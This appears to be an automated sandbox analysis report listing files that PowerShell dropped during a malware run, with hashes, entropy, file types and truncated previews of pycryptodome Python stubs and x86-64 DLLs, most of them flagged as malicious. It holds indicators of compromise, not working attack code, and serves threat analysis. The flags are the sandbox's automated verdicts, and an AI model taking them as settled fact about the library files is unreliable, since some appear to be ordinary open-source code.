                                                                                                                                                                                                                      SHA-512:F9580522EE9EE5F223E8D43F8E61D5CE054D9E1B4F361AD2B6C9DE9CAFCF95BECF8DF21D0B5CDECF59CEA2808F01D0952CD34A4F54B354F506CCA6D971E1F6C5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7267
                                                                                                                                                                                                                      Entropy (8bit):4.832814329763117
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/ItB4RK0tUU4cp/6U41k2T:0rskrs9VqeJ0tUTccT7
                                                                                                                                                                                                                      MD5:EA825091932B4CFC4F055F098A96940A
                                                                                                                                                                                                                      SHA1:1E5BB37CD61FDC47A24F32EE9DEE5B4E277C6237
                                                                                                                                                                                                                      SHA-256:46650BB1BB4A35EE304ABAC23817A48704BABE4F93ECEC4CE62EE97D49C44189
                                                                                                                                                                                                                      SHA-512:F851F5A70C5E4BE206849496C16FABEA11CEE30839A618AAA98EF3177E8C48946E8C4FB7DFDD1AF90889D6470C1A4983FDAA7CB887BDC125170C8AB3DC3F60E2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):576
                                                                                                                                                                                                                      Entropy (8bit):4.621504702467695
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                                                                                                      MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                                                                                                      SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                                                                                                      SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                                                                                                      SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14401
                                                                                                                                                                                                                      Entropy (8bit):4.7888171324327855
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/Iq1IzSsGJ+KLk3eNVkrEPHAZsLzL64giVRWcuL4oozD1o0Bk+Y:0rskrs9VqL1pXNVkrEPH6MXWiXWWtlUX
                                                                                                                                                                                                                      MD5:C8E42C50AB65ABF0D6E88B569F0F6B40
                                                                                                                                                                                                                      SHA1:C55881BB21674E493219FE0612A37BB62085DA9D
                                                                                                                                                                                                                      SHA-256:7610B08153895261645F469F4FB7D2D5211D86CBE7F46D27E49CBB1BA4EC5F94
                                                                                                                                                                                                                      SHA-512:31243C06C0457500389152092114C84AA3BCF042C63213BECA53FD2E920E05427A4CC4B330CAA7FE44C6CB7506D08BFEF9ADDFA04320E10820723F578253F876
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1299
                                                                                                                                                                                                                      Entropy (8bit):4.379657025743841
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RM7ClDTglT3RzEA9unReFnR7PtWLn8no0E+XW3oIQ:cSklORuWLn8nlEF49
                                                                                                                                                                                                                      MD5:FB584A8E53BC1B138B3932BDF16901D5
                                                                                                                                                                                                                      SHA1:CF4F2426C15F17BD613A304B3E7F19A181E2035E
                                                                                                                                                                                                                      SHA-256:80DAE2A187B04F2E3729BCDF78DE0DB31E22CA0922AD420F65077C448F1538E5
                                                                                                                                                                                                                      SHA-512:05D214D0B39CA5566EA833772207D823AF350AEDDAF4A76C9569024D2A374D48FC48A0729B226A1A934E7CA179A5130ABB4232D3412BA27C9DA3DB214A9358BA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import ModuleType..from typing import Union, Tuple, Dict, Optional, overload....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['SivMode']....class SivMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. kwargs: Dict) -> None: ..... .. def update(self, component: Buffer) -> SivMode: ....... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ....... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer) -> Tuple[bytes, bytes]: ..... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                      Entropy (8bit):5.236611028290556
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:osiHXqpoUol3xZhRyQX5lDnRDFFav+tcqgRvE:K6D+XBDfDgRvE
                                                                                                                                                                                                                      MD5:7FA5B1642D52FABFE1D3EBD1080056D4
                                                                                                                                                                                                                      SHA1:56B9E87D613EE9A8B6B71A93ED5FA1603886139A
                                                                                                                                                                                                                      SHA-256:88C7EC96B9E1D168005B3A8727AAA7F76B4B2985083ED7A9FB0A2AB02446E963
                                                                                                                                                                                                                      SHA-512:9E0BF47060A2B7AC8FFD2CB8B845D44013C068BFE74926A67496D79BCB513506625BDA1DDF18ECE7777D1379F036506F19457D0A43FA618A8F75664C47798E64
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d...N..e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1873
                                                                                                                                                                                                                      Entropy (8bit):3.3740616367097997
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1ddPqzseQpoe/HMaDOP4PTpegUgygBVEp5KC:7dWszoG6+hBVEmC
                                                                                                                                                                                                                      MD5:B73C5134DD8AB0FAEBDCED745FB10E33
                                                                                                                                                                                                                      SHA1:17EB54897E236C78E2359D01E3179C25C12C5BD1
                                                                                                                                                                                                                      SHA-256:CD2D0A19763488D875F8F986A9711DD0EEC9CFEF663556A21F9393489ED4CC9C
                                                                                                                                                                                                                      SHA-512:2E3DF1902C064830986D00D17850F1D70097ECCF6E299E65C7BAAAD784DF1DC774B168E67A9B5EA6F7562A2DE9CE3C22465F5ABE2C5CCAE09313C8F89EDA33A3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from Cryptodome.Util._raw_api import (load_pycryptodome_raw_lib, c_size_t,.. c_uint8_ptr)......_raw_pkcs1_decode = load_pycryptodome_raw_lib("Cryptodome.Cipher._pkcs1_decode",.. """.. int pkcs1_decode(const uint8_t *em, size_t len_em,.. const uint8_t *sentinel, size_t len_sentinel,.. size_t expected_pt_len,.. uint8_t *output);.... int oaep_decode(const uint8_t *em,.. size_t em_len,.. const uint8_t *lHash,.. size_t hLen,.. const uint8_t *db,.. size_t db_len);.. """)......def pkcs1_decode(em, sentinel, expected_pt_len, output):.. if len(em) != len(outpu
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):36352
                                                                                                                                                                                                                      Entropy (8bit):6.558039926510444
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Dz5P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuTLg46:DzdqWB7YJlmLJ3oD/S4j990th9VTsC
                                                                                                                                                                                                                      MD5:E63FC8375E1D8C47FBB84733F38A9552
                                                                                                                                                                                                                      SHA1:995C32515AA183DA58F970CEDC6667FAE166615A
                                                                                                                                                                                                                      SHA-256:F47F9C559A9C642DA443896B5CD24DE74FED713BDF6A9CD0D20F5217E4124540
                                                                                                                                                                                                                      SHA-512:4213189F619E7AA71934033CABA401FE93801B334BA8D8EAFEDA89F19B13224C516E4BB4F4F93F6AE2C21CD8F5586D3FFAC3D16CB1242183B9302A1F408F6F6A
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d...L..e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):15872
                                                                                                                                                                                                                      Entropy (8bit):5.285246086368036
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:jJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4mqccqgwYUMvEW:ZkRwi3wO26Ef+yuIm9PfDewgwYUMvE
                                                                                                                                                                                                                      MD5:A914F3D22DA22F099CB0FBFBBB75DDBF
                                                                                                                                                                                                                      SHA1:2834AEB657CA301D722D6D4D1672239C83BE97E3
                                                                                                                                                                                                                      SHA-256:4B4DBF841EC939EF9CC4B4F1B1BA436941A3F2AF2F4E34F82C568DFC09BA0358
                                                                                                                                                                                                                      SHA-512:15BF5FCE53FB2C524054D02C2E48E3DDC4EAC0C1F73325D58B04DFE17259C208FFAC0A7C634FBC2CF1A08E7F28C1FD456061BA0838F4316EB37514E1E8D4C95F
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d...L..e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                      Entropy (8bit):5.505232918566824
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:9d9VkyQ5f8vjVaCHpKpTTjaNe7oca2DWZQ2dhmdcqgwNeecBih:rkP5cjIGpKlqD2DakzgwNeE
                                                                                                                                                                                                                      MD5:9F1A2A9D731E7755EE93C82C91FA5FE2
                                                                                                                                                                                                                      SHA1:41085FBE84E1B98A795871033034FA1F186274EF
                                                                                                                                                                                                                      SHA-256:17F3EAF463868B015583BD611BE5251E36AAB616522FF4072011B3D72F6F552F
                                                                                                                                                                                                                      SHA-512:7E29D4729837D87AEF34CFA7B1F86DFBB81907CD11FC575C4ED1B8A956409492315BFA76ADE4D7C51E51E37E5D098A7F4FEE4C58D86D0E6245A4AA0D392D488A
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...L..e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20992
                                                                                                                                                                                                                      Entropy (8bit):6.061115794354147
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:pUv5cJMOZA0nmwBD+XpJgLa0Mp8QHg4P2llyM:GK1XBD+DgLa1gTi
                                                                                                                                                                                                                      MD5:883DE82B3B17F95735F579E78A19D509
                                                                                                                                                                                                                      SHA1:3EC7259ACA3730B2A6F4E1CA5121DB4AB41C619E
                                                                                                                                                                                                                      SHA-256:67FF6C8BBDC9E33B027D53A26DF39BA2A2AD630ACCE1BAC0B0583CA31ADF914F
                                                                                                                                                                                                                      SHA-512:602915EAA0933F5D1A26ECC1C32A8367D329B12794CBF2E435B1704E548858E64710AB52BC6FC14FC98DF0B8EEBDE2B32A35BCF935079CC8E2412C07DF5303FD
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...L..e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25088
                                                                                                                                                                                                                      Entropy (8bit):6.475398255636883
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Zc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy7IYgLWi:q6H1TZXX5XmrXA+NNxWi0dLWi
                                                                                                                                                                                                                      MD5:0AC22DA9F0B2F84DE9D2B50D457020C1
                                                                                                                                                                                                                      SHA1:682E316AE958121D0E704CAB0F78CCAD42C77573
                                                                                                                                                                                                                      SHA-256:480C79C713AD15328E9EB9F064B90BCDCB5AAD149236679F97B61218F6D2D200
                                                                                                                                                                                                                      SHA-512:11C04D55C5E73583D658E0918BD5A37C7585837A6E0F3C78AEF10A5D7A5C848B0620028177A9D9B0AD5DB882B2A26624F92BEFC9BC8F8A23C002723E50DD80A5
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...M..e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                                                      Entropy (8bit):4.839420412830416
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:CF/1nb2mhQtkr+juOxKbDbRHcqgYvEkrK:42f6iuOsbDXgYvEmK
                                                                                                                                                                                                                      MD5:6840F030DF557B08363C3E96F5DF3387
                                                                                                                                                                                                                      SHA1:793A8BA0A7BDB5B7E510FC9A9DDE62B795F369AE
                                                                                                                                                                                                                      SHA-256:B7160ED222D56925E5B2E247F0070D5D997701E8E239EC7F80BCE21D14FA5816
                                                                                                                                                                                                                      SHA-512:EDF5A4D5A3BFB82CC140CE6CE6E9DF3C8ED495603DCF9C0D754F92F265F2DCE6A83F244E0087309B42930D040BF55E66F34504DC1C482A274AD8262AA37D1467
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...N..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13824
                                                                                                                                                                                                                      Entropy (8bit):4.905258571193623
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:fRgPX8lvI+KnwSDTPUDEnKWPXcqgzQkvEd:4og9rUD/mpgzQkvE
                                                                                                                                                                                                                      MD5:7256877DD2B76D8C6D6910808222ACD8
                                                                                                                                                                                                                      SHA1:C6468DB06C4243CE398BEB83422858B3FED76E99
                                                                                                                                                                                                                      SHA-256:DBF703293CFF0446DFD15BBAEDA52FB044F56A353DDA3BECA9AADD8A959C5798
                                                                                                                                                                                                                      SHA-512:A14D460D96845984F052A8509E8FC44439B616EEAE46486DF20F21CCAA8CFB1E55F1E4FA2F11A7B6AB0A481DE62636CEF19EB5BEF2591FE83D415D67EB605B8E
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d...N..e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14848
                                                                                                                                                                                                                      Entropy (8bit):5.300728193650235
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:jGYJ1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDr6krRcqgUF6+6vEX:jR01si8XSi3SACqe7tDlDgUUjvE
                                                                                                                                                                                                                      MD5:B063D73E5AA501060C303CAFBC72DAD3
                                                                                                                                                                                                                      SHA1:8C1CA04A8ED34252EB233C993DDBA17803E0B81E
                                                                                                                                                                                                                      SHA-256:98BACA99834DE65FC29EFA930CD9DBA8DA233B4CFDFC4AB792E1871649B2FE5C
                                                                                                                                                                                                                      SHA-512:8C9AD249F624BDF52A3C789C32532A51D3CC355646BD725553A738C4491EA483857032FB20C71FD3698D7F68294E3C35816421DFF263D284019A9A4774C3AF05
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..*B..*B..*B..R...*B..UC..*B.RC..*B..*C..*B..UG..*B..UF..*B..UA..*B..J..*B..B..*B....*B..@..*B.Rich.*B.........................PE..d...O..e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):57856
                                                                                                                                                                                                                      Entropy (8bit):4.260136375669177
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:9RUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZvZY0JAIg+v:9rHGHfJidIK
                                                                                                                                                                                                                      MD5:3AEA5302F7F03EDEFF49D1C119C61693
                                                                                                                                                                                                                      SHA1:DBDDE1C10B253744153FC1F47C078AAACCF3F3A6
                                                                                                                                                                                                                      SHA-256:E5DDA67D4DF47B7F00FF17BE6541CA80BDB4B60E1F6FD1A7D7F115DDF7683EE5
                                                                                                                                                                                                                      SHA-512:DD42C24EDAF7E1B25A51BC8C96447496B3289C612C395CA7BD8BF60A162229C2E0CA0432CDDF1CB2D65D80189DB02BEE42FFD0E7DD9E5FC19278CA3FD593AB2C
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d...M..e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):58368
                                                                                                                                                                                                                      Entropy (8bit):4.276947153784193
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:98Uqho9weF5/eHkRnYcZiGKdZHDL7idErZ8ZYXGg:9gCneH//idv2
                                                                                                                                                                                                                      MD5:BA5BA714AEBFD8130EB6E0983FBAE20B
                                                                                                                                                                                                                      SHA1:3309C26A9083EC3AD982DD3D6630FCC16465F251
                                                                                                                                                                                                                      SHA-256:861167DFEB390261E538D635EAD213E81C1166D8D85A496774FBF2EBFF5A4332
                                                                                                                                                                                                                      SHA-512:309CC3FD8DB62517AE70B404C5ACD01052F10582A17123135CD1A28D3A74AB28F90A8E7ED7D2061A4B6C082F85E98DA822D43986FC99367B288A72BA9F8B5569
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d...N..e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                                                      Entropy (8bit):4.579354442149926
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:j0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwoYPj15XkcX6gbW6z:pVddiT7pgTctEEI4qXDe11kcqgbW6
                                                                                                                                                                                                                      MD5:1C74E15EC55BD8767968024D76705EFC
                                                                                                                                                                                                                      SHA1:C590D1384D2207B3AF01A46A5B4F7A2AE6BCAD93
                                                                                                                                                                                                                      SHA-256:0E3EC56A1F3C86BE1CAA503E5B89567AA91FD3D6DA5AD4E4DE4098F21270D86B
                                                                                                                                                                                                                      SHA-512:E96CA56490FCE7E169CC0AB803975BAA8B5ACB8BBAB5047755AE2EEAE177CD4B852C0620CD77BCFBC81AD18BB749DEC65D243D1925288B628F155E8FACDC3540
                                                                                                                                                                                                                      Malicious:true
